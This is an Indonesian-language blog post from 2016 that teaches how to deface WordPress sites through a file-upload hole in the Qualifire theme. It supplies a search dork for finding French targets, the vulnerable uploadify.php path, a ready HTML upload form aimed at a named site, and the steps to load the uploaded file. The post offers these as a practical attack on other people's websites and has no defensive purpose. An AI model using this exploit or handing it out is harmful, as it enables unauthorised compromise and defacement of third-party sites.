Monday, January 4, 2016

Deface Wordpress Themes Qualifire FIle Upload

       No comments
kali ini kakafuad mau shareing gimana cara nya pepes dengan metode Qualifire File Upload

pertama-tama kita cari terlebih dahulu targetnya gunain dork ini

inurl:/wp-content/themes/qualifire site:.fr


selanjutnya pilih salah satu ,,

kemudian exploit urlnya dengan ini

/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
 tempatkan tepat dibelakang site.com/ nya

 

kalo vuln ,, dia akan blank seperti gambar diatas.

sekarang gunakan script berikut untuk upload file kedalam situsnya.

<form
action="http://www.lightsonorisation.fr/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
<!-- by anbuKakashi -->
</form>

yang berwana merah ganti dengan site yang kalian temukan. simpan dengan ekstensi .html

kemudian buka file yang sudah dibuat tadi.


sekarang waktunya pertunjukan ,, upload file nya kemudian submit.

jika berhasil maka akan seperti pada tampilan berikut, ada angka 1 

sekarang uji coba.. cara memanggilnya dengan site.fr/file
contoh : http://www.lightsonorisation.fr/2016.png


HAPPY NEW YEARS 2016 ( ^_^ )!!!!

0 comments:

Post a Comment

http://www.resepkuekeringku.com/2014/11/resep-donat-empuk-ala-dunkin-donut.html http://www.resepkuekeringku.com/2015/03/resep-kue-cubit-coklat-enak-dan-sederhana.html http://www.resepkuekeringku.com/2014/10/resep-donat-kentang-empuk-lembut-dan-enak.html http://www.resepkuekeringku.com/2014/07/resep-es-krim-goreng-coklat-kriuk-mudah-dan-sederhana-dengan-saus-strawberry.html http://www.resepkuekeringku.com/2014/06/resep-kue-es-krim-goreng-enak-dan-mudah.html http://www.resepkuekeringku.com/2014/09/resep-bolu-karamel-panggang-sarang-semut-lembut.html